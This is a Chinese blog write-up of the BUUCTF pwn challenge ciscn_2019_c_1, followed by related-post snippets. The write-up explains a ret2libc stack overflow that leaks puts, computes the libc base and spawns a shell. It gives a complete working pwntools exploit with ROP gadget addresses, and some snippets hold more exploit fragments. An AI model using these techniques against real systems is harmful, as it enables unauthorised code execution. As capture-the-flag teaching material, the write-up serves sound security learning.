[BUUCTF-pwn]——ciscn_2019_c_1

已于 2023-10-24 21:29:41 修改
阅读量1.1k 收藏 1
点赞数 1
分类专栏: # BUUCTF 文章标签: 1024程序员节
于 2021-02-07 13:43:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113486415
版权

[BUUCTF-pwn]——ciscn_2019_c_1

  • 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1
  • 题目:
    在这里插入图片描述
    下载下来checksec一下
    在这里插入图片描述
    再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串,也没有system函数。
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述
应该是ret2libc的题型。仔细观察函数,发现 '\0’开头的字符串可以完美的绕过加密,不改变我们输入的payload。或者也可以自己写一下解密函数。

先用ROPgadget 找一下需要用到的汇编指令的地址。ret ubuntu18上有栈平衡,用来进行栈对齐。
在这里插入图片描述

所以exploit如下

from pwn import*
p=remote('node4.buuoj.cn',27205)
elf=ELF('./ciscn_2019_c_1')
libc = ELF('libc-2.27.so')
context.log_level = 'debug'
main=0x400b28
pop_rdi=0x400c83
ret=0x4006b9
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

p.sendlineafter('Input your choice!\n','1')
payload=b'\x00'+b'a'*(0x50-1+8)
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)

p.sendlineafter('Input your Plaintext to be encrypted\n',payload)
p.recvline() #将下面两个puts跳过
p.recvline()
puts_addr=u64(p.recvuntil('\n')[:-1].ljust(8,b'\x00'))
log.info("puts_addr:" + hex(puts_addr))

libc_base = puts_addr - libc.sym['puts'] #计算偏移
sys_addr = libc_base + libc.sym["system"]
binsh = libc_base + 0x00000000001b3e9a
p.sendlineafter('choice!\n','1')
payload=b'\x00'+b'a'*(0x50-1+8) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(sys_addr) # p64(ret)的数量不固定,可以自己尝试。
p.sendlineafter('encrypted\n',payload)
p.interactive()

会出现两个libc的版本,两个都试试就可以了。
在这里插入图片描述

Y-peak
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 579
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 220
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
BUUCTF-ciscn_2019_c_1(新手pwner的成长日记5)
最新发布
weixin_58410275的博客
04-27 1628
函数的真实地址 = 基地址 + 偏移地址最后,我们来看一下做题思路1.首先寻找一个函数的真实地址(比如这个题目中puts是出现过的函数)构造合理的payload1,劫持程序的执行流程,得到puts函数的真实地址,并重新回到main函数开始的位置。2.找到puts函数的真实地址后,根据其最后三位,可以判断出libc库的版本(这里博主也不是很明白,就不乱讲误人子弟了,这里我采用了挨个试的办法)。3.根据libc库的版本可以很容易的确定puts函数的偏移地址。4.计算基地址。
BUUCTF-Pwn-ciscn_2019_c_1
餐桌上的猫
02-14 3553
题目截图 检查一下文件信息 开启了NX,64位的文件 使用IDA打开 按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串 一番寻找也没有找到system函数 查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手 找到gets函数所在位置查看 在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用 双击进入查看调用函数 运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 554
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 395
buuctf-pwn 001-016题wp
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1272
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1279
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF PWN ciscn_2019_n_1
m0_54262894的博客
09-10 121
拿到文件先checksec 仅开启了NX保护 放入IDA中 查看main函数很简单,没有什么明显漏洞 发现了func函数,双击试试看 可以看到只要v2等于11.25125就可以执行cat flag命令 先把11.28125转为16进制,放着备用(0x41348000) 我们的思路就是利用gets这个危险函数,通过覆盖v1的地址来修改v2的值,进而执行system命令,拿到flag。 写脚本 frompwn impor...
[BUUCTF-pwn] ciscn_2019_ne_1
weixin_52640415的博客
01-08 233
2.27-i386 的堆很少见 4小时才完成,前边想得有点乱了。 堆块的结构: 总管理块0x31:10个块指针 头块0x21:ptr_comment,ptr_name,XXX,XXX两个没用的东西 name块:大小自定不能太大,这个块由scanf %ns 读入,多加\0 这个很隐蔽,一时没发现浪费不少时间。 comment块:0x8c 这个块由read读入后边不带\0,将来用于泄露libc 还有个改名的菜单,转了好...
pwn刷题num24----ret2libc + 栈平衡
tbsqigongzi的博客
04-26 1160
BUUCTF-PWN-ciscn_2019_c_1 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,有三个选择, 欢迎来到这台加密机 1.加密 2.解密 3.退出 选加密1写入三个aaa,被加密成lll,选解密2,出了一句我认为你能自己解密。。。 ida看一
Pwn_buuctf_ciscn_2019_c_1
Trick的博客
11-20 434
libc64 ida查看 在main函数没有发现明显漏洞 跟进encrypt()函数 发现了gets()和puts()函数,可以利用gets的栈溢出泄漏出puts的地址,从而找到libc版本信息getshell exp: from pwn import * from LibcSearcher import * p= remote('node3.buuoj.cn',25412) #p= remote('127.0.0.1',12345) #p = process('./ciscn_2019_c_1') #
ret2text涉及到的堆栈平衡问题
qq_41560595的博客
01-04 4508
这个指令要求rsp+0x40的值是16字节对齐。 错误的题解: from pwn import * io=process("./level0") raw_input() elf=ELF("./level0") system_addr=0x400596 io.recvuntil(b"World\n") payload=b"A"*(0x88)+p64(system_addr) io.send(payload) io.interactive() $rsp+0x40没有16字节对齐。 正确的题解: fro.
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2004
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值